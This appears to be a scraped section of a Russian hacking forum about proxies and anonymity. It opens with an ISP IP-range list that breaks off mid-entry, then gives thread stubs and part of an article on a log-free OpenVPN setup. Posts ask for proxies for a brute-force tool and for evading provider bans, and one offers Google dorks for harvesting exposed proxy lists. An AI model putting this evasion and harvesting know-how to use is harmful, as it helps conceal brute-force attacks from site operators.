range:195.170.231.0 - 195.170.231.255:RU District "A" CATV users (TTK-CATV-NET-2)
range:195.174.96.0 - 195.174.127.255:TR Cable Operator Network of Turk Telekom
range:195.184.160.0 - 195.184.186.255:HU UPC Magyarorszag Kft. (UPC)
range:195.202.35.0 - 195.202.35.255:DE Citykom Muenster GmbH Telekomm CITYKOM-NET
range:195.222.0.0 - 195.222.0.255:EE Eunet Estonia Autonomous System Data Telecom AS
range:195.235.252.12 - 195.235.252.15:ES Universidad Alfonso X El Sabio VPNPA
range:195.239.0.0 - 195.239.255.255:RU Sovam Teleport PROVIDER RU-SOVAM-971210
range:195.240.200.0 - 195.240.230.255:NL ONETOMOVE-World Online B.V.
range:195.244.242.0 - 195.244.243.255:DE Toppoint e.V. - nonprofit org. (TOPPOINT)
range:195.250.160.0 - 195.250.160.255:EE EE-KIIRLIINI Kiirliini AS
range:195.252.160.0 - 195.252.171.255:DE Talkline GmbH & Co. KG (POPSITE-MUENCHEN)
range:195.27.191.0 - 195.27.191.63:DE BEAUTYNET-NET Beautynet
range:195.29.246.0 - 195.29.255.255:HR Croatian Telecom (HINET)
range:195.39.43.64 - 195.39.44.255:CZ KIWWI-CZ-NET Kiwwi s.r.o.
range:195.39.64.0 - 195.39.79.255:CZ CZ-HA-VEL-IMPS ha-vel spol.s r.o.
range:195.4.26.0 - 195.4.26.255:DE Secure Network Consulting (SECURENETWORK-NET)
range:195.41.118.0 - 195.41.118.255:DK TELE-DANMARK-KABEL-TV-NET
range:195.50.192.0 - 195.50.192.255:EE EE-ESDATA1
range:195.53.199.0 - 195.53.199.255:ES Tabacalera s.A. TABACALERA
range:195.55.55.192 - 195.55.55.207:ES Internet Public Adresses(ALIMERKA)
range:195.56.0.0 - 195.56.255.255:HU DataNet Telecommunication (HU-DATANET-960426)
range:195.57.120.0 - 195.57.123.255:ES Telefonica De Espana SAU RIMA
range:195.80.96.0 - 195.80.111.255:EE Department of Data Communications ASONET
range:195.92.0.0 - 195.92.255.255:UK Planet Online UK-POL-960612
range:195.95.117.0 - 195.95.117.31:LU Tele2/Tango Rue de Luxembourg (TELE2)
range:196.40.0.0 - 196.40.79.255:CR Radiografica Costarricense S.A. (NETBLK-RACSA)
range:196.40.35.0 - 196.40.35.255:CR Cable Tica Canal 7(NETBLK-CABLE-TICA-1-NET)
range:198.110.208.0 - 198.110.209.255:US MichNet (NETBLK-MICH-570)
range:198.81.0.0 - 198.81.31.255:US America Online (AOL-NET2-B)
range:198.93.104.1 - 198.93.104.64:US UniversalClass.com Inc (NETBLK-NYIC-UNIVERSAL)
range:198.93.224.0 - 198.93.231.255:US CGNET Services International(NETBLK-NETBLK-CGNET-224)
range:199.73.32.0 - 199.73.41.255:US Verio, Inc. (NET-VRIO-199-073-032)
range:199.84.182.0 - 199.84.183.255:CA Servacom America incorporated (NETBLK-SERVACOM)
range:200.128.0.0 - 200.255.255.255:BR Comite Gestor da Internet(NETBLK-BRAZIL-BLK2)
range:200.17.0.0 - 200.20.255.255:BR Comite Gestor da Internet no Brasil (NETBLK-BRAZIL-BLK1)
range:200.37.206.64 - 200.37.206.127:PE BMP Ingenieros SA (NETBLK-UNRD-BMP)
range:202.132.54.0 - 202.132.55.255:TW GOLDLIFE-AP(Taiwan)
range:202.138.192.0 - 202.138.207.255:AU REQUESTDSL-AU NATIONAL NETWORK
range:202.144.158.128 - 202.144.158.191:BT Unicef/WFP Network UNICEF-NET
range:202.28.4.0 - 202.28.7.255:TH King Mongkut's University of Technolgy(KMUTT-TH)
range:202.28.92.0 - 202.28.95.255:TH Khon Kaen University KKU-TH
range:202.84.32.0 - 202.84.47.255:BD Internet Service Provider (BOL-BD)
range:202.85.159.64 - 202.85.159.78:HK Portalbar.com Ltd.PORTALBARCOM-HK
range:202.89.128.0 - 202.89.159.255:NZ Mercury Telecommunications Ltd MERCURY1-NZ
range:203.162.20.112 - 203.162.20.127:VN Trung tam Dieu hanh Vien thong TTDHVT-NET
range:203.197.46.32 - 203.197.46.63:IN LEASED - SCHOOLNET MUMBAI
range:203.57.65.0 - 203.57.65.255:AU REPAIRTECH-AU Repair Tech
range:203.93.166.0 - 203.93.167.255:CN JiTong Company Dalian Company Co.,LTD(JITONG-DL)
range:204.146.0.0 - 204.146.255.255:US Advantis (NETBLK-ROADNET)
range:204.148.96.0 - 204.148.103.255:US America Online, Inc. (AOL-96-103)
range:204.247.0.0 - 204.247.255.255:US Verio, Inc. (NET-VRIO-204-247)
range:204.252.0.0 - 204.255.255.255:US UUNET Technologies, Inc. (NETBLK-UUNETCBLK252)
range:204.34.170.0 - 204.34.170.255:US Naval Air Systems Command (NET-NADEP)
range:205.134.172.0 - 205.134.172.255:US Patuxent Publishing (NET-AIN-MAE-E-FDDI172)
range:205.146.0.0 - 205.146.255.255:US Verio, Inc. (NET-VRIO-205-146)
range:205.160.0.0 - 205.163.255.255:US SPRINT (NETBLK-SPRINT-BLKE)
range:205.188.0.0 - 205.188.255.255:US AOL America Online, Inc. (NETBLK-AOL-DTC)
range:205.231.160.0 - 205.231.175.255:US CTI / Netrax (NETBLK-NETRAX-CTI)
range:205.232.2.0 - 205.232.2.255:US SUNY Research Foundation, Buffalo State College - CDHS
range:205.246.80.0 - 205.246.95.255:US Red Rose Systems (NETBLK-SPRINT-CDF65F)
range:206.130.189.0 - 206.130.189.255:CA Encode Business Systems Inc (NET-ENCODE-NET)
range:206.176.0.0 - 206.176.127.255:US SDnet (SDNET-BLK-2)
range:206.20.111.0 - 206.20.111.255:US American Scholastic Association (NET-IOSNET-4-111)
range:206.24.4.0 - 206.24.5.255:US ANNAPOLIS INTERNET INC. (NETBLK-CW-NETBLK-ANNAPOLI)
range:206.47.0.0 - 206.47.255.255:CA WorldLinx Telecommunications, Inc. (NETBLK-WORLDLINX-4)
range:206.61.140.0 - 206.61.141.255:US HARVEST COMMUNICATION INC (NETBLK-SPRINT-CE3D8C-1)
range:206.71.32.0 - 206.71.47.255:US SDnet (SDNET-BLK-1)
range:206.99.0.0 - 206.99.31.255:US OUS -ITS (NETBLK-CW-206-99-0)
range:207.241.160.0 - 207.241.191.255:US NETSATX-1 (NETBLK-NETSATX-1)
range:207.248.32.0 - 207.248.63.255:MX Television Internacional C.V.(NETBLK-RED-INTERCABLE)
range:207.68.128.0 - 207.68.207.255:US MSN-BLK(NETBLK-MSN-BLK)
range:207.88.0.0 - 207.88.255.255:US XO Communications (NET-XOXO-BLK-2)
range:208.191.18.168 - 208.191.18.175:US American Association of Petroleum (NETBLK-SBCIS81285)
range:208.223.8.0 - 208.223.15.255:US Kingwood Cablevision (NETBLK-UU-208-223-8-B)
range:208.3.72.128 - 208.3.72.255:US ENCOMPASS SERVICES CORPORATION (NETBLK-FON-348987609653424)
range:208.3.72.128 - 208.3.72.255:US ENCOMPASS SERVICES CORPORATION(NETBLK-FON-348987609653424)
range:208.4.8.0 - 208.4.9.255:US GlassCity Internet, Inc. (NETBLK-SPRINT-D00408-2)
range:209.126.128.0 - 209.126.191.255:US California Regional Internet, Inc. (NETBLK-CARI)
range:209.140.64.0 - 209.140.79.255:US Internet Connect (NETBLK-INCONNECT-GN)
range:209.150.225.160 - 209.150.225.191:US Stone Travel (NETBLK-NET-CCI-STONETRAVEL2)
range:209.232.0.0 - 209.233.255.255:US Pacific Bell Internet Services (PBI-NET-5)
range:209.249.0.0 - 209.249.255.255:US Abovenet Communications, Inc. (NETBLK-ABOVENET-4)
range:209.5.216.0 - 209.5.219.255:CA Vaxxine (NETBLK-NET-VAXXINE-5-216)
range:209.60.152.0 - 209.60.152.255:US VPM Enterprises (NETBLK-CRL-VPM)
range:209.81.0.0 - 209.81.63.255:US ViaNet Communications(NETBLK-VIANETCO)
range:210.116.0.0 - 210.123.255.255:KR Korea Network Information Center(KRNIC-KR)
range:210.160.0.0 - 210.175.255.255:JP Japan Network Information Center JPNIC-NET-JP
range:210.204.0.0 - 210.207.255.255:KR Korea Network Information Center KRNIC-KR
range:210.226.0.0 - 210.231.255.255:JP Japan Network Information Center(JPNIC-NET-JP)
range:210.248.0.0 - 210.255.255.255:JP Japan Network Information Center(JPNIC-NET-JP)
range:210.252.160.0 - 210.252.255.0:JP Open Data Network JAPAN TELECOM (ODN)
range:210.59.128.0 - 210.59.255.255:TW HINET-TW CHTD, Chunghwa Telecom Co.,Ltd.Taipei Taiwan
range:210.66.0.0 - 210.66.255.255:US State of Georgia/Board of Regents(NETBLK-PEACHNETB-BLK1)
range:211.0.0.0 - 211.7.255.255:JP Japan Network Information Center JPNIC-NET-JP
range:211.1.132.0 - 211.1.143.0:JP Japan Network Information Center Tiki (TIKI)
range:211.104.0.0 - 211.119.255.255:KR Korea Network Information Center (KRNIC-KR)
range:211.11.0.0 - 211.11.63.0:JP Open Computer Network (OCN[1])
range:211.132.16.0 - 211.132.31.0:JP Japan Network Information Center DOLPHIN (DOLPHIN)
range:211.167.122.1 - 211.167.122.255:CN Cable OnLine Network Xuhui3 Shanghai China
range:211.22.0.0 - 211.22.255.255:TW HINET-TW CHTD, Chunghwa Telecom Co.,Ltd
range:211.23.0.0 - 211.23.255.255:TW CHTD, Chunghwa Telecom Co.,Ltd HINET-TW
range:211.52.0.0 - 211.63.255.255:KR Korea Network Information Center KRNIC-KR
range:211.67.168.0 - 211.67.175.255:CN HADOE-CN Henan Province Department Of Education
range:211.74.128.0 - 211.74.255.255:TW Digital United Inc. (SEEDNET-TW)
range:212.0.192.0 - 212.0.223.255:MD MD-MOLDTELECOM-980804
range:212.107.32.0 - 212.107.35.191:EE Levicom Broadband OU
range:212.118.0.0 - 212.118.10.255:JO National Equipment & Technical Services,NETS-NETWORK
range:212.121.137.128 - 212.121.137.255:DE Index Agentur GmbH-COLT-INDEX
range:212.125.208.192 - 212.125.208.255:NO Agder IT AGDERIT1-NO-24072000
range:212.142.8.0 - 212.142.11.255:NL cablemodem Telekabel TK-EDE-1
range:212.144.16.0 - 212.144.17.255:DE o.tel.o GmbH (O-TEL-O-IPBB)
range:212.144.192.0 - 212.144.255.255:DE Mannesmann Arcor AG & Co (AOL-NET4)
range:212.152.169.168 - 212.152.169.175:AT UTA Internet Operations UTA Telekom AG
range:212.160.147.64 - 212.160.147.95:PL INET PLUS S.C.
range:212.169.154.0 - 212.169.154.255:DE NXDE-DIAL-BLOCK-04 Nextra Germany Dialin Pool 4
range:212.17.89.0 - 212.17.89.255:AT Telekabel Wien GmbH (SK-15-CUSTOMER-6)
range:212.17.90.0 - 212.17.91.255:AT Telekabel Wien GmbH (SK-15-CUSTOMER-7)
range:212.174.189.0 - 212.174.189.63:TR MALIYE BAKANLIGI(MALIYE)
range:212.179.143.0 - 212.179.152.255:IL MED-ONE POP-DAILUP-USERS
range:212.185.208.0 - 212.185.255.255:DE Deutsche Telekom AG (DTAG-DIAL9)
range:212.186.196.0 - 212.186.197.255:AT Headend for Customers (KLAFU-CUSTOMER-1)
range:212.186.199.0 - 212.186.199.255:AT chello Austria (GRAZ-STUDENTS-1)
range:212.186.24.0 - 212.186.31.255:AT chello Austria (VIE-11-CUSTOMER-1)
range:212.186.80.0 - 212.186.95.255:AT chello Austria (VIE-11-CUSTOMER-2)
range:212.187.42.0 - 212.187.43.255:NL Chello Nijmegen Cablemodems 5 (TK-ALM-CBL-4)
range:212.192.224.0 - 212.192.255.255:RU Moscow State University MSUNET
range:212.194.0.0 - 212.194.255.255:FR T-ONLINEFRANCE T-Online France - Club Internet
range:212.202.0.0 - 212.202.255.255:DE DE-GINKO-980324
range:212.204.184.0 - 212.204.191.255:NL @Home Benelux Groningen (BENELUX-1)
range:212.205.208.0 - 212.205.255.255:GR Multiprotocol Service Provider (OTENET)
range:212.22.32.0 - 212.22.32.15:ES RETECALNET Retecal Sociedad Operadora de Telecomunicaciones
range:212.246.176.0 - 212.246.179.255:FI Tampere Telephone Plc (TPO-DIALUP4)
range:212.246.192.0 - 212.246.192.255:FI Tampere Telephone Plc (TPO-DIALUP2)
range:212.246.193.0 - 212.246.195.255:FI Tampere Telephone Plc (TPO-DIALUP3)
range:212.27.224.0 - 212.27.225.159:EE Estonian Wireless Network EWNNET
range:212.30.64.0 - 212.30.69.255:SI SIOL-NET-SiOL d.o.o. (Slovenia Online)
range:212.43.32.0 - 212.43.34.63:CH Gestronic Net Switzerland(CH-GESTRONIC)
range:212.47.192.0 - 212.47.192.15:LT LT-KPNQWEST-BACKBONE Lithuania
range:212.49.0.0 - 212.49.2.255:EE Anet Eesti MAINOR
range:212.58.162.0 - 212.58.167.255:NL Sonera Nederland (SONERA-QUICKNET-MULTIKABEL-05)
range:212.63.19.0 - 212.63.22.255:FI Tampere Telephone Plc (TPO-DIALUP)
range:212.66.0.0 - 212.66.3.255:DE DE-SIS-INTERNAL Securitas Internet Systems
range:212.7.0.0 - 212.7.1.255:EE INFONET.EE ISP in Tallinn, Estonia INFONET-EE
range:213.100.0.0 - 213.100.255.255:SE SWIPNET-000403
range:213.106.97.0 - 213.106.111.255:GB NTL BIA - Stoke Cable Modem DHCP Pool
range:213.107.16.0 - 213.107.31.255:GB NTL Glasgow - CABLE HEADEND
range:213.122.0.0 - 213.122.255.255:GB BT-IMSNET (BT-IMSNET)
range:213.139.164.128 - 213.139.164.191:FI OULU TELEPHONE COMPANY (OPOY-NET16)
range:213.142.64.0 - 213.142.87.255:NO World Online Norway (WOLNO)
range:213.157.0.0 - 213.157.1.255:DE HEAG MediaNet GmbH (HEAG-MEDIANET-01)
range:213.157.128.0 - 213.157.128.255:AT Webserver Network Linz (AUSTRIAONE-NET)
range:213.157.2.0 - 213.157.2.255:DE HEAG MediaNet GmbH (HEAG-MEDIANET-02)
range:213.168.0.0 - 213.168.1.255:EE Estpak Data/Estonian Telephone Co EE-ESTPAK
range:213.174.90.0 - 213.174.91.255:NL Tachyon Europe B.V
range:213.178.64.0 - 213.178.67.255:DE TNG Kiel (TNG)
range:213.180.0.0 - 213.180.0.31:EE KODU-AED ICA Media AS
range:213.194.32.0 - 213.194.32.15:NL RICOH-EUROPE-BV
range:213.197.64.0 - 213.197.87.207:HU Internet services network (START-NET)
range:213.20.0.0 - 213.20.255.255:DE DE-MEDIAWAYS-990820 mediaWays GmbH PROVIDER
range:213.25.194.16 - 213.25.194.31:PL TELPOL Sosnowiec
range:213.46.0.0 - 213.46.255.255:NL Provider Local Registry (NL-CHELLO-991108)
range:213.46.40.0 - 213.46.47.255:NL Chello Com21 GelreVision (TK-ZTP-CABLE)
range:213.5.0.0 - 213.5.100.255:GR Altec Communications Network (GR-ACN-ASSIGNED)
range:213.51.0.0 - 213.51.7.255:NL BENELUX-PALET-GELEEN-1
range:213.56.232.0 - 213.56.239.255:FR FTCI (FR-FTCI-20000327-2)
range:213.56.240.0 - 213.56.255.255:FR FTCI (FR-FTCI-20000327-1)
range:213.57.0.0 - 213.57.63.255:IL Fast Internet Company MATAV (NONSTOP-CABLE)
range:213.6.0.0 - 213.7.151.255:DE MobilCom Cityline GmbH (MOBILCOM-CITYLINE-NET)
range:213.64.0.0 - 213.64.255.255:SE Telia Network services ISP-TELIANET
range:213.73.64.0 - 213.73.110.255:DE INTERDOTNET Inter.Net Germany GmbH Berlin
range:213.76.252.128 - 213.76.252.255:PL Warszawa Sluzewiec (SLUZEWIEC-SDI)
range:213.8.0.0 - 213.8.19.255:IL Ramat-Gan POP (EURONET)
range:213.89.36.0 - 213.89.39.255:SE Chello Sweden (STOCKHOLM-KAERRTORP-CABLE)
range:216.0.0.0 - 216.5.255.255:US Business Internet, Inc. (NET-ICIX-MD-BLK17)IMBI
range:216.100.0.0 - 216.103.255.255:US Pacific Bell Internet Services (PBI-NET-6)
range:216.101.108.0 - 216.101.109.255:US ADSL BASIC-rback1.snfc21 (NETBLK-PBI-CUSTNET-9415)
range:216.127.0.0 - 216.127.31.255:US The Discount Internet Network (NETBLK-TDIN)
range:216.155.0.0 - 216.155.63.255:US The Magnetic Page (NETBLK-MAGPAGE)
range:216.167.0.0 - 216.167.127.255:US Verio, Inc. (NET-VRIO-216-167-000)
range:216.183.0.0 - 216.183.31.255:CA GROUPTELECOM-BLK-6A
range:216.227.0.0 - 216.227.127.255:US Telocity (NETBLK-TELOCITY)
range:216.231.96.0 - 216.231.127.255:US The Telecom Security Group (NETBLK-TTSG-BLK)
range:216.24.0.0 - 216.24.63.255:US WinNET Communications (NETBLK-ASN-WINNET)
range:216.243.0.0 - 216.243.63.255:US NECLEC, LLC (NETBLK-IPT)
range:216.76.0.0 - 216.79.255.255:US Bellsouth.net, Inc. (NETBLK-BELLSNET-BLK5)
range:216.99.224.0 - 216.99.255.255:US Internet Allegiance, Inc. (NETBLK-ALGX)
range:217.0.0.0 - 217.5.127.255:DE Deutsche Telekom AG (DTAG-DIAL13)
range:217.136.0.0 - 217.136.31.255:BE SKYNET-20010125-ADSL BAS bru-stro TL GO/PLUS
range:217.164.0.0 - 217.164.44.255:AE Emirates Telecommunications Corporation(EMIRNET-EMIRNET)
range:217.208.0.0 - 217.208.255.255:SE GT Group Telecom Services Corp. (NET-GROUPTELECOM-BLK-6A)
range:217.215.88.0 - 217.215.95.255:SE BONET-BROADBAND-Stockholm
range:217.59.158.0 - 217.59.158.31:IT SORGENTE-TRAFICANTE-SRL
range:217.59.205.24 - 217.59.205.31:IT SALUMIFICIO-SCARLINO-SRL
range:217.8.0.0 - 217.8.31.255:UK IOMART-20010807
range:217.80.0.0 - 217.89.31.255:DE Deutsche Telekom AG(DTAG-DIAL14)
range:217.96.2.224 - 217.96.2.239:PL ALDEC-POLSKA
range:217.99.239.0 - 217.99.239.127:PL SOSNOWIEC-SDI TP S.A. SDI
range:218.112.0.0 - 218.143.255.255:JP BB Technology Corp.Nation wide network in Japan (BBTECH)
range:218.186.0.0 - 218.186.127.255:SG Singapore Cable Vision Ltd (SGCABLEVISION-SG)
range:218.40.0.0 - 218.47.255.255:JP Japan Network Information Center JPNIC-NET-JP
range:24.55.9.0 - 24.55.9.255:US Adelphia Cable (NETBLK-ADEL-VNUYCA-TG2-L1-1)
range:4.0.0.0 - 4.255.255.255:US GENUITY (NET-GNTY-4-0)
range:61.112.0.0 - 61.127.255.255:JP Japan Network Information Center JPNIC-NET-JP
range:61.115.64.0 - 61.115.127.0:JP XePhion NTT-ME Corporation (XEPHION)
range:61.157.0.0 - 61.157.255.255:CN CHINANET Sichuan province network
range:61.200.0.0 - 61.215.255.255:JP Japan Network Information Center JPNIC-NET-JP
range:61.207.0.0 - 61.207.255.0:JP Open Computer Network (OCN[2])
range:61.216.0.0 - 61.219.255.255:TW CHTD, Chunghwa Telecom Co.,Ltd.HINET-TW
range:62.0.64.0 - 62.0.191.255:IL Netvision pop sites (NV-POPS)
range:62.11.0.0 - 62.11.175.255:IT Tiscali SpA (TISCALINET)
range:62.153.0.0 - 62.153.43.255:DE Deutsche Telekom AG (DTAG-DIAL11)
range:62.155.128.0 - 62.155.255.255:DE Deutsche Telekom AG (DTAG-DIAL10)
range:62.158.0.0 - 62.158.255.255:DE Deutsche Telekom AG (DTAG-DIAL8)
range:62.163.120.0 - 62.163.123.255:NL Chello DHCP COM21 (UPC-KT-CABLE50)
range:62.163.124.0 - 62.163.127.255:NL Chello DHCP COM21 (UPC-KT-CABLE51)
range:62.163.224.0 - 62.163.227.255:NL Chello DHCP COM21 (UPC-KT-CABL

3proxy

ID: 676533bbb4103b69df371e01
Thread ID: 7410
Created: 2006-03-14T19:50:51+0000
Last Post: 2006-05-26T17:48:48+0000
Author: +toxa+
Replies: 6 Views: 4K

Вопрос: Чё надо прописать в 3proxy при установке (или в конфиг), чтоб он стал анонимным? А то после проверки он всегда выдаёт тип HTTP самый обычный

Грабим прокси гуглом

ID: 676533bbb4103b69df371e03
Thread ID: 8075
Created: 2006-04-24T21:53:07+0000
Last Post: 2006-05-15T12:36:14+0000
Author: Winux
Replies: 8 Views: 4K

Не буду долго масло маслить - скаже коротко и ясно.
Многие веб мастера кладут прокси листы себе на сервак. А от большого брата ничо не скроешь.
Короче вот примеры запросов:

inurl:proxylist.txt
inurl:proxylist.htm
inurl:proxylist.html
inurl:proxylist.php
inurl:proxylist.asp
inurl:proxy.txt
inurl:proxies.txt
inurl:prox.txt
inurl:anon.txt

Можно пофантазировать...

Ищу прокси

ID: 676533bbb4103b69df371e0c
Thread ID: 5282
Created: 2005-10-23T08:11:47+0000
Last Post: 2006-03-08T10:40:31+0000
Author: Nightwalker
Replies: 8 Views: 4K

Ищу прокси для Ipdbrute2.Где можно взять?

ТОННЕЛЬ ПРОКСИ-GZIP

ID: 676533bbb4103b69df371e10
Thread ID: 6919
Created: 2006-02-07T10:38:17+0000
Last Post: 2006-02-09T06:51:50+0000
Author: TimON
Replies: 9 Views: 4K

ТОННЕЛЬ ПРОКСИ-GZIP

Кто-нть может рассказать о технологии сжатия данных?
Т.е. имея скажем платный хостинг, я должен установить программу (прокси- сервер?), затем в качестве прокси в броузере указываю этот хост, и получаю данные но сжатые.
+ уменьшается время закачки
+ уменьшается трафик

Теперь вопрос: как это делается?

Мало живых прокси

ID: 676533bbb4103b69df371e11
Thread ID: 6666
Created: 2006-01-22T21:44:16+0000
Last Post: 2006-01-23T06:54:50+0000
Author: SovaEnd
Replies: 12 Views: 4K

:help: разобраться с прокси. мне например нужно 16 прокси.
для их поиска юзаю чекер с proxychecker.net. находит он 6000 прокси к примеру.из них живых только семь.
после всего,он не сохраняет прокси в указанный файл.
что я делаю не так?
или дайте свои варианты нахождения прокси.

Proxy

ID: 676533bbb4103b69df371e13
Thread ID: 5721
Created: 2005-11-26T20:34:08+0000
Last Post: 2005-12-04T15:44:32+0000
Author: Dron
Replies: 7 Views: 4K

Где чекать и брать бесплатные прокси листы?

Смена прокси

ID: 676533bbb4103b69df371e16
Thread ID: 5238
Created: 2005-10-20T19:21:21+0000
Last Post: 2005-11-14T14:37:56+0000
Author: Nightwalker
Replies: 7 Views: 4K

Народ киньте прогу которая будет автоматически прокси менять.

Прокси для брута

ID: 676533bbb4103b69df371e0f
Thread ID: 7203
Created: 2006-02-27T23:10:42+0000
Last Post: 2006-03-08T10:36:06+0000
Author: Gamers
Replies: 4 Views: 3K

Ищу прокси для IPDBrute. где скачать можно?

VPN

ID: 676533bbb4103b69df371dfa
Thread ID: 7899
Created: 2006-04-15T20:50:15+0000
Last Post: 2006-06-29T15:36:40+0000
Author: Robin Gud
Replies: 4 Views: 3K

Не могу понять!Купил доступ, подключаюсь по vpn, появляется иконка в трее...Но захожу на свой любимый сайт(xss.is/ ), и тут раз не грузится!Самое главное веб хак и гугл грузится на ура, а некоторые сайты не открываются...Оключился - и снова всё в порядке!Непонимаю, от чего это может зависеть?!

VPN

ID: 676533bbb4103b69df371e04
Thread ID: 8308
Created: 2006-05-06T22:03:54+0000
Last Post: 2006-05-07T14:03:59+0000
Author: Dude03
Replies: 3 Views: 3K

собственно в теме отражен и сам вопрос. если уже борода, то можете удалить. но помогите, пожалуйста. Как совместить впн и прокси сервер???? то есть я подключаюсь к впн и юзаю потом прокси сервер.

Ссылки на proxy

ID: 676533bbb4103b69df371e05
Thread ID: 7993
Created: 2006-04-20T22:20:33+0000
Last Post: 2006-04-23T14:40:22+0000
Author: eMag
Replies: 2 Views: 3K

http://proxy-socks.net

ID: 676533bbb4103b69df371e07
Thread ID: 7548
Created: 2006-03-25T11:50:00+0000
Last Post: 2006-04-01T18:49:40+0000
Author: klsbere
Replies: 5 Views: 3K

hi
kto nibud znaet shto sluchilos s http://proxy-socks.net

Запрет на использование анонимных proxy.

ID: 676533bbb4103b69df371e08
Thread ID: 7331
Created: 2006-03-09T11:15:32+0000
Last Post: 2006-04-01T10:55:31+0000
Author: Val
Replies: 6 Views: 3K

Ситуация следующая: пользовался ProxySwitcher при попытке использования анонимных прокси пишет, что ваш провайдер запретил использование анонимных прокси-серверов.
Вопрос: можно ли обмануть провайдера?
Или пользовать SOCKS?
А может послать его и делу конец?

Ищу серваки с бесплатными прокси-листами

ID: 676533bbb4103b69df371e09
Thread ID: 7570
Created: 2006-03-27T07:33:14+0000
Last Post: 2006-03-28T16:41:51+0000
Author: {{4x}}
Replies: 6 Views: 3K

Для работы определенного скрипта нужно достаточно много (>1 K) живых проксей. Т.ч. в настоящий момент ищу серваки с достаточно большим количеством проксей и что не маловажно - их оперативным обновлением (хотя бы раз в месяц) humbsup: что также критически важно - так это отсутсвие разного рода проверок (например ввод цифр с картинки), потому как прокси будет собирать сам скрипт. Желательно чтобы прокси были в формате адрес:порт . Всем ответившим заранее спасибо

Аномайзеры

ID: 676533bbb4103b69df371e0b
Thread ID: 7417
Created: 2006-03-15T11:10:52+0000
Last Post: 2006-03-15T17:02:22+0000
Author: Flashtlt
Replies: 3 Views: 3K

Кто подскажет хорошие Аномайзеры желатьльно руские и крякнуты =)

Нужны бесплатные SOCKS

ID: 676533bbb4103b69df371e0e
Thread ID: 6394
Created: 2006-01-07T16:27:03+0000
Last Post: 2006-03-08T10:36:59+0000
Author: faf
Replies: 2 Views: 3K

Может кто-нибудь дать 100% работающие в данное время SOCKS прокси? Желательно 4-ые и 5-ые сразу. А то я так и немогу протестить FreeCap...

Вопрос по поднятой собственной выходной ноде Тор

ID: 676533bbb4103b69df371ccf
Thread ID: 37673
Created: 2020-05-23T06:16:55+0000
Last Post: 2020-05-25T15:57:58+0000
Author: Kirigaya
Replies: 19 Views: 3K

Коллеги, а вот такой вопрос, насколько я знаю выходной нодой можно поставить собственноручно поднятую на vps, насколько эффективно такое решение? Вообще хотелось бы услышать ваше мнение по данной теме.

VeraCrypt, обсуждение

ID: 676533bbb4103b69df3718e0
Thread ID: 110334
Created: 2024-03-13T14:12:18+0000
Last Post: 2024-12-20T01:28:18+0000
Author: Agent J
Replies: 22 Views: 3K

Всем привет!
Только начинаю свое знакомство с VeraCrypt и сразу столкнулся с проблемой. Не дает зашифровать весь диск, хотя он не внешний и всего один. Шировать только системный раздел я так понимаю особого смысла нет, т.к. он отвечает только за загрузку системы. А может мне вообще не надо так заморачиваться и просто создать контейнер и хранить все рабочие инструменты в нем? Единственное чем планирую пользоваться это парочка виртуальных машин.

Утечка IP, как проверить VPN, обсуждение

ID: 676533bbb4103b69df3718f0
Thread ID: 119958
Created: 2024-08-01T00:00:06+0000
Last Post: 2024-12-10T19:32:04+0000
Author: dunkel
Replies: 22 Views: 3K

Вчера забанило акк на одном сайте. Оказалось мой реальный айпи который был в бане утек через впн, при том что у меня включен киллсвич.
Решил проверить, оставил виртуалку на сутки пинговаться с моим сервером, где логируются айпи. Впн включен, killswitch включен.
Утром в логе из миллиарда строк обнаружил пару строк с моим реальным айпи(между миллионом строк айпи впна до и после), тоесть впн иногда пролагивает на микросекунду и один пакет почему то приходит с реального хоста.
У меня все. Используйте впн+впн

Настройка OpenVPN без логов / логирования

ID: 676533bbb4103b69df3718f2
Thread ID: 100066
Created: 2023-10-14T12:33:45+0000
Last Post: 2024-12-09T16:47:09+0000
Author: grozdniyandy
Prefix: Статья
Replies: 19 Views: 3K

verb 0

Для кого предназначена эта статья?

Для всех, кто хочет настроить свой собственный openvpn. Я видел множество людей, продающих это как услугу, и множество людей, которые хотят купить это как услугу, так что написать статью об этом - не такая уж плохая идея. Я не убиваю чей-либо бизнес(возможно сам начну продажу), очевидно, что люди, которые хотят купить это как услугу, либо ленивы, либо ничего не понимают в Linux.

Предварительные требования:

Базовые знания Linux

Словарь
Журнал - лог

Содержание

Местоположение логов в Linux
Настраиваем OpenVPN
Стоит ли автоматом ежедневно удалять логи?
Мы -> OpenVPN -> Tor

С момента моего рождения :лол: в нашей жизни обеспечение онлайн-приватности стало более актуальным, чем когда-либо. OpenVPN - это одно из наиболее надежных решений для создания виртуальных частных сетей (VPN). В этой статье мы рассмотрим, как настроить OpenVPN и удалить все логи для обеспечения максимальной приватности.

Прежде чем приступить к настройке openvpn и т.д. Сначала мы должны понять, что регистрируется в нашем Linux и где. Одной из клёвых частей Linux является система регистрации событий, которая позволяет нам отслеживать работу системы

логирование.

Я не знаю, как вы, ребята, это настраиваете, если есть что-то, что я пропустил, не стесняйтесь добавлять в комментариях.

Местоположение логов в Linux

В большинстве дистрибутивов Linux, лог файлы хранятся в каталоге /var/log. В этом каталоге каждый сервис может создавать собственный лог файл. Я воспользуюсь атак боксом TryHackMe и посмотрю, какие логи там хранятся, в которых может содержаться информация о подключении.

auth.log

Давайте начнем с auth.log. Этот файл содержит информацию о попытках аутентификации, включая попытки входа в систему по SSH и другим методам. Мы можем найти IP-адреса, из которых выполнялись попытки подключения, а также информацию о том, удалось ли успешно аутентифицироваться или нет. Администраторы могут анализировать этот лог для выявления неудачных попыток аутентификации и источников, откуда эти попытки были предприняты. Также стоит упомянуть, в системах Debian и Ubuntu используется auth.log, в то время как в CentOS и Red Hat этот файл может иметь название "secure".

syslog

Системный журнал, известный как syslog является стандартным логом событий в большинстве дистрибутивов Linux. Он включает в себя информацию о системных событиях, включая сетевую активность. Журнал syslog подразделяется на уровни важности, что упрощает фильтрацию и анализ, и позволяет обнаруживать проблемы, связанные с безопасностью и производительностью. Обычно статьи советуют вам искать "ssh" и т.д. Я предпочитаю искать по IP-адресам. Для этого можно использовать команду grep с регулярными выражениями.

Изображение [1]: syslog

На изображении ниже мы видим несколько IP-адресов. Один из них из Кореи, похоже, кто-то оттуда сканировал IP-адреса aws на username "Admin", которое предназначено для Windows, но почему-то захотел подключиться по ssh.

Эта команда извлекает уникальные IP-адреса из файлов auth.log/syslog:

Code:Copy to clipboard

cat auth.log | grep -E -R '([0-9]{1,3}\.){3}[0-9]{1,3}'
cat syslog* | grep -E -R '([0-9]{1,3}\.){3}[0-9]{1,3}'

Изображение [2]: auth.log

Изображение [3]: Корейский IP

Изображение [4]: IP адреса в syslog

